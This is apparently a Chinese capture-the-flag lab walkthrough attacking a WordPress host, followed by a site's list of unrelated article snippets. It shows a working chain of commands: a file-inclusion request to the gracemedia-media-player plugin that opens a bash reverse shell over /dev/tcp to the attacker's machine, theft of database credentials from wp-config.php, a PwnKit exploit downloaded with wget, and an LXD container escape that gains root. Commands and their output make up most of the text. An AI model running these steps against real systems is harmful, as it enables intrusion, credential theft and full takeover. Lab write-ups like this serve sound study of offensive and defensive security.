└─# curl "http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.110.139%2F10086%200%3E%261"
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# nc -lvnp 10086                                                                                    
listening on [any] 10086 ...
connect to [192.168.110.139] from (UNKNOWN) [192.168.110.138] 43884
bash: cannot set terminal process group (1207): Inappropriate ioctl for device
bash: no job control in this shell
<t/plugins/gracemedia-media-player/templates/files$ cd ~
www-data@hackerctflab:/var/www$

6、www-data 用户 信息收集

  • 获取信息:
    • 数据库用户密码:root : root
    • 这里尝试S权限:polkit-agent-helper-1 (CVE-2021-4034)提权
    • 没有找到什么过多有用的信息,还是返回「3.2.3」进行操作,才能提权
www-data@hackerctflab:/var/www$ grep -ri -E 'DB_PASSWORD' *
grep -ri -E 'DB_PASSWORD' *
html/wp/wp-admin/setup-config.php:              define( 'DB_PASSWORD', $pwd );
html/wp/wp-admin/setup-config.php:                              case 'DB_PASSWORD':
html/wp/wp-config.php:define( 'DB_PASSWORD', 'root' );
html/wp/wp-config-sample.php:define( 'DB_PASSWORD', 'password_here' );
html/wp/wp-includes/load.php:   $dbpassword = defined( 'DB_PASSWORD' ) ? DB_PASSWORD : '';
www-data@hackerctflab:/var/www$ cat html/wp/wp-config.php
cat html/wp/wp-config.php
<?php
......
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );/** MySQL database username */
define( 'DB_USER', 'root' );/** MySQL database password */
define( 'DB_PASSWORD', 'root' );/** MySQL hostname */
define( 'DB_HOST', 'localhost' );/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
......
www-data@hackerctflab:/var/www$ find / -perm -u=s -type f 2>/dev/null | grep -v "/snap/"
find / -perm -u=s -type f 2>/dev/null
/usr/libexec/polkit-agent-helper-1
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/su
/usr/bin/passwd
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/chsh
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign

6.1、尝试 CVE-2021-4034 提权(失败)

  • 靶机 gcc 版本确定
www-data@hackerctflab:/tmp$ ldd --version
ldd --version
ldd (Ubuntu GLIBC 2.33-0ubuntu5) 2.33
Copyright (C) 2021 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
  • kali 编译
(base) ┌──(root㉿kali)-[/usr/local/soft/hack/CVE-2021-4034]
└─# gcc cve-2021-4034.c -o exp -Ldir /usr/local/soft/hack/libc/lib/x86_64-linux-gnu/libc.so.6(base) ┌──(root㉿kali)-[/usr/local/soft/hack/CVE-2021-4034]
└─# ls
cve-2021-4034.c  cve-2021-4034.sh  dry-run  exp  LICENSE  Makefile  pwnkit.c  README.md(base) ┌──(root㉿kali)-[/usr/local/soft/hack/CVE-2021-4034]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.110.138 - - [04/Dec/2023 23:08:18] "GET /exp HTTP/1.1" 200 -
  • 靶机执行
www-data@hackerctflab:/tmp$ wget "http://192.168.110.139/exp"
wget "http://192.168.110.139/exp"
--2023-12-04 15:08:20--  http://192.168.110.139/exp
Connecting to 192.168.110.139:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15960 (16K) [application/octet-stream]
Saving to: 'exp'0K .......... .....                                      100%  129M=0s2023-12-04 15:08:20 (129 MB/s) - 'exp' saved [15960/15960]www-data@hackerctflab:/tmp$ chmod +x exp
chmod +x exp
www-data@hackerctflab:/tmp$ ./exp
./exp
GLib: Cannot convert message: Could not open converter from “UTF-8” to “PWNKIT”
Cannot run program pwnkit.so:.: No such file or directory

7、jarves 用户 信息收集

  • id 具有权限:116(lxd)
jarves@hackerctflab:~$ history1  sudo su -2  ifconfig3  ls4  cd upload/5  ls6  ls -l7  cd ..8  ls -l9  chmod 755 jarves/10  history
jarves@hackerctflab:~$ id
uid=1000(jarves) gid=1000(jarves) groups=1000(jarves),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
jarves@hackerctflab:~$ sudo -l
[sudo] password for jarves: 
Sorry, try again.
[sudo] password for jarves: 
Sorry, try again.
[sudo] password for jarves: 
sudo: 3 incorrect password attempts
jarves@hackerctflab:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/traceroute6.iputils cap_net_raw=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
jarves@hackerctflab:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
jarves@hackerctflab:~$ echo $BASH_VERSION
5.1.4(1)-release

8、LXD 提权

  • SMB 上传文件
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# git clone https://github.com/saghul/lxd-alpine-builder(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cd lxd-alpine-builder(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# smbclient //192.168.110.138/welcome
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> put alpine-v3.13-x86_64-20210218_0139.tar.gz 
putting file alpine-v3.13-x86_64-20210218_0139.tar.gz as \alpine-v3.13-x86_64-20210218_0139.tar.gz (25670.9 kb/s) (average 25670.9 kb/s)
smb: \> exit
  • 后续可以上传「.ssh」实现免密登录
jarves@hackerctflab:~$ ls
alpine-v3.13-x86_64-20210218_0139.tar.gz  secrets  something  upload
jarves@hackerctflab:~$ lxc image import ./alpine*.tar.gz --alias myimage
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first instance, try: lxc launch ubuntu:18.04Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
jarves@hackerctflab:~$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 
Name of the new storage pool [default=default]: Name of the storage backend to use (dir, lvm, ceph, btrfs) [default=btrfs]: 
Create a new BTRFS pool? (yes/no) [default=yes]: 
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=5GB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: 
What should the new bridge be called? [default=lxdbr0]: 
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
Would you like the LXD server to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: jarves@hackerctflab:~$ lxc init myimage mycontainer -c security.privileged=true
Creating mycontainer
jarves@hackerctflab:~$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to mycontainer
jarves@hackerctflab:~$ lxc start mycontainer
jarves@hackerctflab:~$ lxc exec mycontainer /bin/sh
~ # id
uid=0(root) gid=0(root)
~ #

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/198002.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

能源企业管理ERP系统都有哪些?可以帮助企业解决哪些难点

能源企业在不同的发展阶段面对的经营压力以及遇到的管理问题各异&#xff0c;随着部分产品结构的复杂化&#xff0c;日常经营管理工作也愈加繁琐。 有些能源企业内部存在信息传递不畅、经营数据统计不及时、部门协作效率低、多仓库和多平台数据不统一等情况&#xff0c;而这些…

RH850P1X芯片学习笔记-Overview

文章目录 Outline产品列表功能框图特点Pin和引脚功能CPU系统CPUFPU浮点运算单元中断处理保护机制指令缓存Local RAMGlobal RAM处理器间通信和相互排斥机制 操作模式中断功能DMA电源供电Reset控制单元时钟控制单元CSIH-SPIMCAN看门狗计时器系统计时器GTM通用定时器模块外设互联P…

openCV在Visual Studio2019下的集成使用

文章目录 下载OpenCV工具选择合适库文件使用visual studio创建空项目测试运行运行结果 下载OpenCV工具 官网下载实在太慢&#xff0c;还老实下不下来。下面从网上找到些别人分享的一些版本&#xff08;从3.4到4.7&#xff09;放到了网盘里&#xff0c;请按需下载使用。 链接&a…

轻量封装WebGPU渲染系统示例<43>- PBR材质与阴影实(源码)

原理简介: 1. 基于rendering pass graph实现。 2. WGSL Shader 基于文件系统和宏机制动态组装。 当前示例源码github地址: https://github.com/vilyLei/voxwebgpu/blob/feature/rendering/src/voxgpu/sample/PBRShadowTest.ts 当前示例运行效果: 此示例基于此渲染系统实现&a…

Ribbon-IRule 修改负载均衡的规则

1、负载均衡规则描述 &#xff08;1&#xff09;整体关系 &#xff08;2&#xff09;规则描述 内置负载均衡规则类规则描述RoundRobinRule简单轮询服务列表来选择服务器。它是Ribbon默认的负载均衡规则。AvailabilityFilteringRule对以下两种服务器进行忽略: (1)在默认情况下&…

1-4、调试汇编程序

语雀原文链接 文章目录 1、执行过程第一步&#xff1a;源程序第二步&#xff1a;编译连接第三步&#xff1a;执行 2、DOSBox运行程序第1步 进入EDIT.EXE第2步 编写源程序第3步 编译第4步 连接第5步 执行完整过程 3、DEBUG跟踪执行过程加载程序到内存执行程序debug和源程序数字…

软件平台架构设计与技术管理之道笔记

软件平台架构设计与技术管理之道笔记 认知 领导软件平台各方面的工作&#xff0c;对技术底蕴、思维模式、决策能力、工作风格、文化铸造等方面都有极高的要求&#xff0c;可以称之为“领域智慧”。认知盲区的代价是巨大的&#xff0c;“不知”比“不会”的后果更严重&#xf…

探讨Unity中的动画融合技术(BlendTree)

动画在游戏和虚拟现实应用中扮演着关键的角色&#xff0c;而动画融合技术则是使角色动作更加流畅和逼真的核心。在Unity引擎中&#xff0c;我们可以使用动画混合树&#xff08;Blend Trees&#xff09;来实现这一目标。本篇技术博客将深入讨论动画融合技术的实现原理、在Unity中…

做一个类似万师傅家政小程序需要有哪些功能?

现如今人们生活节奏不断加快&#xff0c;自然很少有时间去处理生活中的琐事&#xff0c;恰好家政维修保洁小程序开发则能给线下用户提供方便。 家政保洁小程序应该具备哪些功能&#xff1f; 1、提供家政行业资讯&#xff0c;方便用户在选择家政保洁前了解行业动态。 2、分类搜…

Android wifi Enable之后扫描流程

流程框架图 通常我们在设备开启wifi之后&#xff0c;等会会自动扫描出周围的热点。 下面看下自动扫描周围热点的流程 代码流程 1. ClientModeManager.ClientModeStateMachine ClientModeStateMachine 由CMD_START 转换到StartedStateStartedState 状态机&#xff0c;在更新…

让代码变得优雅简洁的神器:Java8 Stream流式编程

原创/朱季谦 本文主要基于实际项目常用的Stream Api流式处理总结。 因笔者主要从事风控反欺诈相关工作&#xff0c;故而此文使用比较熟悉的三要素之一的【手机号】黑名单作代码案例说明。 我在项目当中&#xff0c;很早就开始使用Java 8的流特性进行开发了&#xff0c;但是一直…

流媒体方案之FFmpeg——实现物联网视频监控项目

目录 前言 一、FFmpeg介绍 二、FFmpeg简易理解 三、FFmpeg的重要概念 四、软硬件准备 五、移植、运行FFmpeg 六、运行FFmpeg 前言 最近想做一个安防相关的项目&#xff0c;所以跟着韦东山老师的视频来学习视频监控方案的相关知识&#xff0c;韦东山老师讲的课非常好&…

LaTex入门简明教程

文章目录 写在前面安装Texlive的安装TeXstudio 的安装 LaTex 的使用节指令图指令表指令公式指令参考文献指令引用指令TeXstudio 编译 LaTex 的 \label{} 写法建议最后 写在前面 这篇文章面向没有任何 LaTex 基础的小白&#xff0c;主要讲解了 LaTex 的安装和使用。读完文章之后…

android https 证书过期

有的时候 我们android https 证书过期 &#xff0c;或者使用明文等方式去访问服务器 可能会碰到类似的 问题 &#xff1a; javax.net.ssl.SSLHandshakeException: Chain validation failed java.security.cert.CertPathValidatorException: Response is unreliable: its validi…

通讯录管理系统(基于C语言)

模块设计 本通讯录管理系统功能模块共包括9个部分&#xff1a;1.输入数据、2.显示数据、 3.插入数据、4.删除数据、5.查看数据、6.修改数据、7.保存数据、 8.返回主菜单、9.退出系统. 一&#xff0e;总体设计 通讯录的每一条信息包括&#xff1a;姓名、性别、住址、联系电话…

西南科技大学模拟电子技术实验七(集成运算放大器的非线性应用)预习报告

一、计算/设计过程 说明:本实验是验证性实验,计算预测验证结果。是设计性实验一定要从系统指标计算出元件参数过程,越详细越好。用公式输入法完成相关公式内容,不得贴手写图片。(注意:从抽象公式直接得出结果,不得分,页数可根据内容调整) 预习计算内容根据运放的非线…

【Linux下如何生成coredump文件】

一&#xff0c;什么是coredump 我们经常听到大家说到程序core掉了&#xff0c;需要定位解决&#xff0c;这里说的大部分是指对应程序由于各种异常或者bug导致在运行过程中异常退出或者中止&#xff0c;并且在满足一定条件下&#xff08;这里为什么说需要满足一定的条件呢&#…

QT使用SQLite(打开db数据库以及对数据库进行增删改查)

QTSQLite 在QT中使用sqlite数据库&#xff0c;有多种使用方法&#xff0c;在这里我只提供几种简单&#xff0c;代码简短的方法&#xff0c;包括一些特殊字符处理。 用SQlite建立一个简单学生管理数据库 数据库中有两个表一个是class和student。 class表结构 student表结果…

非标设计之气缸类型

空压机&#xff1a; 空压机又称空气压缩机&#xff0c;简单来说就是将机械能转化为压力能来进行工作的&#xff0c;空压机在电力行业应用比较多&#xff0c;除了在电力行业应用较多外&#xff0c;其实空压机还有一个比较常见的用途就是用来制冷和分离气体&#xff0c;输送气体…

【web安全】RCE漏洞原理

前言 菜某的笔记总结&#xff0c;如有错误请指正。 RCE漏洞介绍 简而言之&#xff0c;就是代码中使用了可以把字符串当做代码执行的函数&#xff0c;但是又没有对用户的输入内容做到充分的过滤&#xff0c;导致可以被远程执行一些命令。 RCE漏洞的分类 RCE漏洞分为代码执行…